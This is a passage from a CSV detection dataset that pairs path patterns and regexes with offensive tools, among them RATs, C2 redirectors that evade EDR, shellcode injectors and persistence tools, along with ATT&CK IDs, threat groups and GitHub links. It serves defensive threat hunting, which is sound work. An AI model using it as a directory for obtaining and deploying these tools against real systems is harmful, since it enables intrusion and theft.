- T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10263" "*/Recon-AD-LocalGroups.dll*",".{0,1000}\/Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10264" "*/Recon-AD-SPNs.dll*",".{0,1000}\/Recon\-AD\-SPNs\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10265" "*/Recon-AD-Users.dll*",".{0,1000}\/Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10266" "*/Recon-AD-Users.dll*",".{0,1000}\/Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10267" "*/recon-archy.git*",".{0,1000}\/recon\-archy\.git.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","10268" "*/reconftw.cfg*",".{0,1000}\/reconftw\.cfg.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10269" "*/reconftw.git*",".{0,1000}\/reconftw\.git.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10270" "*/reconftw.sh*",".{0,1000}\/reconftw\.sh.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10271" "*/reconFTW.yml*",".{0,1000}\/reconFTW\.yml.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10272" "*/reconftw/Recon/*",".{0,1000}\/reconftw\/Recon\/.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10273" "*/reconftw:main*",".{0,1000}\/reconftw\:main.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out 
vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10274" "*/reconftw-data*",".{0,1000}\/reconftw\-data.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10275" "*/RecycledInjector*",".{0,1000}\/RecycledInjector.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","10276" "*/RecycledInjector.git*",".{0,1000}\/RecycledInjector\.git.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","10277" "*/RedBackdoorer.py*",".{0,1000}\/RedBackdoorer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","10278" 
"*/RedDevil v1.0.exe*",".{0,1000}\/RedDevil\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10279" "*/RedGuard.git*",".{0,1000}\/RedGuard\.git.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10280" "*/RedGuard.go*",".{0,1000}\/RedGuard\.go.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10281" "*/RedGuard_32",".{0,1000}\/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - 
APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10282" "*/RedGuard_64",".{0,1000}\/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10283" "*/redirect-hack.html?id=*",".{0,1000}\/redirect\-hack\.html\?id\=.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","10284" "*/redirector/redirector.py*",".{0,1000}\/redirector\/redirector\.py.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","10285" "*/redirecttosmb.py*",".{0,1000}\/redirecttosmb\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","10286" "*/redis-brute.nse*",".{0,1000}\/redis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10287" "*/redis-info.nse*",".{0,1000}\/redis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10288" "*/redpeanut.cer*",".{0,1000}\/redpeanut\.cer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10289" "*/RedPeanut.git*",".{0,1000}\/RedPeanut\.git.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10290" "*/RedPeanut.html*",".{0,1000}\/RedPeanut\.html.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10291" "*/RedPeanutAgent/*",".{0,1000}\/RedPeanutAgent\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - 
TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10292" "*/RedPeanutRP/*",".{0,1000}\/RedPeanutRP\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10293" "*/RedPersist.exe*",".{0,1000}\/RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","10294" "*/RedPersist.git*",".{0,1000}\/RedPersist\.git.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","10295" "*/redpill.ps1*",".{0,1000}\/redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10296" "*/redpill/bin/*.ps1*",".{0,1000}\/redpill\/bin\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","#linux","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10297" "*/redsocks.sh*",".{0,1000}\/redsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","10298" "*/redsocks-fw.sh*",".{0,1000}\/redsocks\-fw\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","10299" "*/RedTeam_toolkit*",".{0,1000}\/RedTeam_toolkit.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming 
together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","10300" "*/RedTeam_Tools_n_Stuff.git*",".{0,1000}\/RedTeam_Tools_n_Stuff\.git.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","10301" "*/red-team-scripts*",".{0,1000}\/red\-team\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","10303" "*/RedWarden.git*",".{0,1000}\/RedWarden\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","10304" "*/ReferenceSourceLibraries/Sharpire*",".{0,1000}\/ReferenceSourceLibraries\/Sharpire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - 